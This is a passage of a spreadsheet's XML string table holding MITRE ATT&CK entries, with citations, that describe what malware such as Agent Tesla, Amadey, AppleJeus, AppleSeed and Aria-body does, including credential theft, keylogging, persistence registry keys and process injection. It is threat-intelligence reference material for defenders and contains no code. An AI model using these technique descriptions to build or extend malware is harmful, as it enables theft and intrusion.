    <t>[Action RAT](https://attack.mitre.org/software/S1028) can use WMI to gather AV products installed on an infected host.(Citation: MalwareBytes SideCopy Dec 2021)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain users.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Cybereason Bumblebee August 2022)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can enumerate domain groups.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can gather information about organizational units (OUs) and domain trusts from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Symantec Bumblebee June 2022)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) has the ability to query Active Directory for computers.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[AdFind](https://attack.mitre.org/software/S0552) can extract subnet information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can encrypt data with 3DES before sending it over to a C2 server.(Citation: Talos Agent Tesla Oct 2018)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to use form-grabbing to extract data from web data forms.(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim’s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from configuration or support files.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to steal credentials from FTP clients and wireless profiles.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can gather credentials from a number of browsers.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to extract credentials from the Registry.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to decrypt strings encrypted with the Rijndael symmetric encryption algorithm.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has the capability to kill any running analysis processes and AV software.(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has routines for exfiltration over SMTP, FTP, and HTTP.(Citation: Talos Agent Tesla Oct 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has created hidden folders.(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used &lt;code&gt;ProcessWindowStyle.Hidden&lt;/code&gt; to hide windows.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can download additional files for execution on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can log keystrokes on the victim’s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)(Citation: SentinelLabs Agent Tesla Aug 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect account information from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used SMTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has been executed through malicious e-mail attachments (Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can achieve persistence by modifying Registry key entries.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has had its code obfuscated in an apparent attempt to make analysis difficult.(Citation: Fortinet Agent Tesla April 2018) [Agent Tesla](https://attack.mitre.org/software/S0331) has used the Rijndael symmetric encryption algorithm to encrypt strings.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can list the current running processes on the system.(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has used process hollowing to create and manipulate processes through sections of unmapped memory by reallocating that space with its malicious code.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can inject into known, vulnerable binaries on targeted hosts.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can add itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has dropped RegAsm.exe onto systems for performing malicious activity.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331)  has achieved persistence via scheduled tasks.(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can capture screenshots of the victim’s desktop.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">The primary delivered mechaism for [Agent Tesla](https://attack.mitre.org/software/S0331) is through email phishing messages.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the IP address of the victim machine and spawn instances of netsh.exe to enumerate wireless settings.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: SentinelLabs Agent Tesla Aug 2020) </t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the username from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the timestamp from the victim’s machine.(Citation: DigiTrust Agent Tesla Jan 2017)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) can access the victim’s webcam and record video.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Talos Agent Tesla Oct 2018)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Agent Tesla](https://attack.mitre.org/software/S0331) has he ability to perform anti-sandboxing and anti-virtualization checks.(Citation: Malwarebytes Agent Tesla April 2020)</t>
  </si>
  <si>
    <t>[Agent Tesla](https://attack.mitre.org/software/S0331) has used HTTP for C2 communications.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Agent Tesla](https://attack.mitre.org/software/S0331) has used wmi queries to gather information from the system.(Citation: Bitdefender Agent Tesla April 2020) </t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) saves system information into an XML file that is then XOR-encoded.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.(Citation: Securelist Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) attempts to download an encrypted binary from a specified domain.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Agent.btz](https://attack.mitre.org/software/S0092) obtains the victim username and saves it to a file.(Citation: ThreatExpert Agent.btz)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) can collect information from a compromised host.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has decoded antivirus name strings.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has sent victim data to its C2 servers.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has used fast flux DNS for its C2.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has searched for folders associated with antivirus software.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) can download and execute files to further infect a host machine with additional malware.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has modified the `:Zone.Identifier` in the ADS area to zero.(Citation: Korean FSI TA505 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has overwritten registry keys for persistence.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has obfuscated strings such as antivirus vendor names, domains, files, and others.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has changed the Startup folder to the one containing its executable by overwriting the registry keys.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has checked for a variety of antivirus products.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has collected the computer name and OS version from a compromised machine.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) does not run any tasks or install additional malware if the victim machine is based in Russia.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) can identify the IP address of a victim machine.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has collected the user name from a compromised host using `GetUserNameA`.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Amadey](https://attack.mitre.org/software/S1025) has used HTTP for C2 communications.(Citation: BlackBerry Amadey 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has been signed with valid certificates to evade detection by security tools.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can install itself as a cron job.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>Variants of [Anchor](https://attack.mitre.org/software/S0504) can use DNS tunneling to communicate with C2.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can terminate itself if specific execution flags are not present.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can use secondary C2 servers for communication after establishing connectivity and relaying victim information to primary C2 servers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can self delete its dropper after the malware is successfully deployed.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can download additional payloads.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used NTFS to hide files.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used ICMP in C2 communications.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has obfuscated code with stack strings and string encryption.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can support windows execution via SMB shares.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can create a scheduled task for persistence.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can create and execute services to load its payload.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has come with a packed payload.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can determine the hostname and linux version on a compromised host.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can determine the public IP and location of a compromised host.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) can execute payloads via shell scripting.(Citation: Medium Anchor DNS July 2020)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used HTTP and HTTPS in C2 communications.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Anchor](https://attack.mitre.org/software/S0504) has used cmd.exe to run its self deletion routine.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Anchor](https://attack.mitre.org/software/S0504) can establish persistence by creating a service.(Citation: Cyberreason Anchor December 2019)	</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has presented the user with a UAC prompt to elevate privileges while installing.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[AppleJeus](https://attack.mitre.org/software/S0584) has used a valid digital signature from Sectigo to appear legitimate.(Citation: CISA AppleJeus Feb 2021) </t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has decoded files received from a C2.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has exfiltrated collected host information to a C2 server.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has deleted the MSI file after installation.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has added a leading &lt;code&gt;.&lt;/code&gt; to plist filenames, unlisting them from the Finder app and default Terminal directory listings.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>During [AppleJeus](https://attack.mitre.org/software/S0584)'s installation process, it uses `postinstall` scripts to extract a hidden plist from the application's `/Resources` folder and execute the `plist` file as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) with elevated permissions.(Citation: ObjectiveSee AppleJeus 2019)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has placed a plist file within the &lt;code&gt;LaunchDaemons&lt;/code&gt; folder and launched it manually.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has loaded a plist file using the &lt;code&gt;launchctl&lt;/code&gt; command.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has required user execution of a malicious MSI installer.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584)'s spearphishing links required user interaction to navigate to the malicious website.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has been installed via MSI installer.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has XOR-encrypted collected system information prior to sending to a C2. [AppleJeus](https://attack.mitre.org/software/S0584) has also used the open source ADVObfuscation library for its components.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has created a scheduled SYSTEM task that runs when a user logs in.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has been distributed via spearphishing link.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has collected the victim host information after infection.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has waited a specified time before downloading a second stage payload.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has used shell scripts to execute commands after installation and set persistence mechanisms.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)</t>
  </si>
  <si>
    <t>[AppleJeus](https://attack.mitre.org/software/S0584) has sent data to its C2 server via &lt;code&gt;POST&lt;/code&gt; requests.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[AppleJeus](https://attack.mitre.org/software/S0584) can install itself as a service.(Citation: CISA AppleJeus Feb 2021) </t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can gain system level privilege by passing &lt;code&gt;SeDebugPrivilege&lt;/code&gt; to the &lt;code&gt;AdjustTokenPrivilege&lt;/code&gt; API.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has compressed collected data before exfiltration.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can zip and encrypt data collected on a target system.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has automatically collected data from USB drives, keystrokes, and screen images before exfiltration.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has divided files if the size is 0x1000000 bytes or more.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can collect data on a compromised host.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can find and collect data from removable media devices.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can decode its payload prior to execution.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can exfiltrate files via the C2 channel.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has exfiltrated files using web services.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can use a second channel for C2 when the primary channel is in upload mode.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can delete files from a compromised host after they are exfiltrated.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to use JavaScript to execute PowerShell.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can use &lt;code&gt;GetKeyState&lt;/code&gt; and &lt;code&gt;GetKeyboardState&lt;/code&gt; to capture keystrokes on the victim’s machine.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can stage files in a central location prior to exfiltration.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can achieve execution through users running malicious file attachments distributed via email.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can disguise JavaScript files as PDFs.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to use multiple dynamically resolved API calls.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to Base64 encode its payload and custom encrypt API calls.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to execute its payload via PowerShell.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can enumerate the current process on a compromised host.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to create the Registry key name &lt;code&gt;EstsoftAutoUpdate&lt;/code&gt; at &lt;code&gt;HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce&lt;/code&gt; to establish persistence.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can call regsvr32.exe for execution.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can take screenshots on a compromised host by calling a series of APIs.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has used UPX packers for its payload DLL.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has been distributed to victims through malicious e-mail attachments.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can identify the OS version of a targeted system.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can identify the IP of a targeted system.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) can pull a timestamp from the victim's machine.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to communicate with C2 over HTTP.(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the titles of running windows on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used ZIP to compress data gathered on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to execute a process using &lt;code&gt;runas&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to collect data from USB devices.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to decrypt the loader configuration and payload DLL.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a DGA for C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to inject itself into another process such as rundll32.exe and dllhost.exe.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to delete files and directories on compromised hosts.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather metadata from a file and to search for file and directory names.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to download additional payloads from C2.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to launch files using &lt;code&gt;ShellExecute&lt;/code&gt;.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used TCP in C2 communications.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has used an encrypted configuration file for its loader.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to enumerate loaded modules for a process.(Citation: CheckPoint Naikon May 2020).</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to use a reverse SOCKS proxy module.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has established persistence via the Startup folder or Run Registry key.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to capture screenshots on compromised hosts.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the location, public IP address, and domain name on a compromised host.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
    <t>[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather TCP and UDP table status listings.(Citation: CheckPoint Naikon May 2020)</t>
  </si>
  <si>
